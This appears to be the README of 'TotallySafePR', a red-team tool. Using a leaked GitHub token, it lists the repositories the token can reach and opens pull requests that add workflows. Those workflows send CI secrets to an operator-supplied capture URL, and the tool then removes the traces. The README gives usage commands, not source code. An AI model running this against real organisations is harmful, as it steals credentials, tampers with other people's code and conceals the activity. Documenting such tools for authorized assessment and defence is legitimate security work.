TotallySafePR is a specialized security research tool designed to demonstrate the risks of exposed GitHub Personal Access Tokens and insecure workflow configurations.
The companion blog post titled So You Put Your Secrets in GitHub. Bold Move. provides a comprehensive analysis of the attack mechanics and defensive strategies.
TotallySafePR provides a streamlined workflow for assessing GitHub organization security through several key capabilities:
- Repository Enumeration: The tool efficiently discovers all repositories accessible to a provided token across user accounts and organizations to build a complete target map.
- Workflow Injection: It automates the creation of pull requests that introduce diagnostic workflows into target repositories without manual intervention.
- Secret Exfiltration: The injected workflows capture environment variables and transmit them to a specified endpoint for analysis to prove the impact of the compromise.
- Cleanup: The utility includes mechanisms to automatically close pull requests and remove branches to minimize the footprint of the engagement after data collection.
The tool operates by leveraging the permissions of a provided GitHub Personal Access Token to map the attack surface and execute code within the CI environment.
flowchart TD
PAT[Discover Github PAT]
Repos[Find all repos]
PRs[Create PRs]
CI[Workflow runs in CI]
Exfil[Env POSTed to URL]
Cleanup[Optional cleanup]
PAT --> Repos --> PRs --> CI --> Exfil --> Cleanup
- Discover and Clone Repositories: The operator uses the enumeration script to list all repositories accessible to the token and optionally clones them for static analysis.
- Create a Pull Request: The tool pushes a new branch containing a workflow file that triggers on pull request events and pushes the code to the repository.
- Exfiltrate Secrets: The GitHub Actions runner executes the workflow which dumps the environment variables and transmits them to the control server.
- Automatic Cleanup: The script waits for a specified duration before replacing the malicious workflow with a benign one and closing the pull request to hide traces of the activity.
The repository includes two primary scripts that handle the enumeration and exploitation phases of the assessment.
You must have bash, curl, jq, and git installed on your system. You also need a valid GitHub Personal Access Token with repository access.
The clone-repos.sh script handles the discovery and cloning of repositories.
export GITHUB_TOKEN=ghp_...
./clone-repos.shThis command fetches all repositories available to the authenticated user and prompts for confirmation before cloning them to the local filesystem. The list of repositories is saved to repos.txt for further processing.
The create-pr.sh script automates the creation of the pull request and the exfiltration process.
export GITHUB_TOKEN=ghp_...
./create-pr.sh owner/repo https://your-capture-url/You can optionally configure the script to perform automatic cleanup by setting the AUTO_CLOSE_AFTER_SECONDS environment variable.
AUTO_CLOSE_AFTER_SECONDS=120 ./create-pr.sh owner/repo https://your-capture-url/This configuration waits for two minutes to allow the workflow to complete before closing the pull request and deleting the branch.
Use this tool only on systems you own or have explicit permission to test. This software is intended for security research and authorized assessments. The authors are not responsible for misuse.